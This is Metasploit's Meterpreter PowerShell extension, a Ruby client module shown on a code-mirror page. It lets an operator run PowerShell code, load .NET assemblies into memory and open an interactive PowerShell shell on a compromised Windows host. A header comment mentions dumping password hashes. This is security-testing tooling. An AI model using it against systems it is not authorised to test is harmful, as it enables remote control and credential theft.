Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/lib/rex/post/meterpreter/extensions/powershell/powershell.rb
19500 views
1
# -*- coding: binary -*-

2


3
require 'rex/post/meterpreter/extensions/powershell/tlv'

4
require 'rex/post/meterpreter/extensions/powershell/command_ids'

5


6
module Rex

7
module Post

8
module Meterpreter

9
module Extensions

10
module Powershell

11


12
###

13
#

14
# This meterpreter extensions a privilege escalation interface that is capable

15
# of doing things like dumping password hashes and performing local

16
# exploitation.

17
#

18
###

19
class Powershell < Extension

20


21
  def self.extension_id

22
    EXTENSION_ID_POWERSHELL

23
  end

24


25
  def initialize(client)

26
    super(client, 'powershell')

27


28
    client.register_extension_aliases(

29
      [

30
        {

31
          'name' => 'powershell',

32
          'ext'  => self

33
        },

34
      ])

35
  end

36


37


38
  def import_file(opts={})

39
    return nil unless opts[:file]

40


41
    # if it's a script, then we'll just use execute_string

42
    if opts[:file].end_with?('.ps1')

43
      opts[:code] = ::File.read(opts[:file])

44
      return execute_string(opts)

45
    end

46


47
    # if it's a dll (hopefully a .NET 2.0 one) then do something different

48
    if opts[:file].end_with?('.dll')

49
      # TODO: perhaps do some kind of check to see if the DLL is a .NET assembly?

50
      binary = ::File.read(opts[:file])

51


52
      request = Packet.create_request(COMMAND_ID_POWERSHELL_ASSEMBLY_LOAD)

53
      request.add_tlv(TLV_TYPE_POWERSHELL_ASSEMBLY_SIZE, binary.length)

54
      request.add_tlv(TLV_TYPE_POWERSHELL_ASSEMBLY, binary)

55
      client.send_request(request)

56
      return { loaded: true }

57
    end

58


59
    return { loaded: false }

60
  end

61


62
  def session_remove(opts={})

63
    return false unless opts[:session_id]

64
    request = Packet.create_request(COMMAND_ID_POWERSHELL_SESSION_REMOVE)

65
    request.add_tlv(TLV_TYPE_POWERSHELL_SESSIONID, opts[:session_id]) if opts[:session_id]

66
    client.send_request(request)

67
    return true

68
  end

69


70
  def execute_string(opts={})

71
    return nil unless opts[:code]

72


73
    request = Packet.create_request(COMMAND_ID_POWERSHELL_EXECUTE)

74
    request.add_tlv(TLV_TYPE_POWERSHELL_CODE, opts[:code])

75
    request.add_tlv(TLV_TYPE_POWERSHELL_SESSIONID, opts[:session_id]) if opts[:session_id]

76


77
    response = client.send_request(request)

78
    result = {}

79
    handle = client.sys.config.get_token_handle()

80
    if handle != 0

81
      result[:warning] = 'Impersonation will not apply to PowerShell.'

82
    end

83


84
    result[:output] = response.get_tlv_value(TLV_TYPE_POWERSHELL_RESULT)

85
    return result

86
  end

87


88
  def shell(opts={})

89
    request = Packet.create_request(COMMAND_ID_POWERSHELL_SHELL)

90
    request.add_tlv(TLV_TYPE_POWERSHELL_SESSIONID, opts[:session_id]) if opts[:session_id]

91


92
    response = client.send_request(request)

93
    channel_id = response.get_tlv_value(TLV_TYPE_CHANNEL_ID)

94
    if channel_id.nil?

95
      raise Exception, "We did not get a channel back!"

96
    end

97


98
    result = {}

99
    handle = client.sys.config.get_token_handle()

100
    if handle != 0

101
      result[:warning] = 'Impersonation will not apply to PowerShell.'

102
    end

103


104
    result[:channel] = Rex::Post::Meterpreter::Channels::Pools::StreamPool.new(client, channel_id, 'powershell_psh', CHANNEL_FLAG_SYNCHRONOUS, response)

105


106
    result

107
  end

108


109
end

110


111
end; end; end; end; end

112


113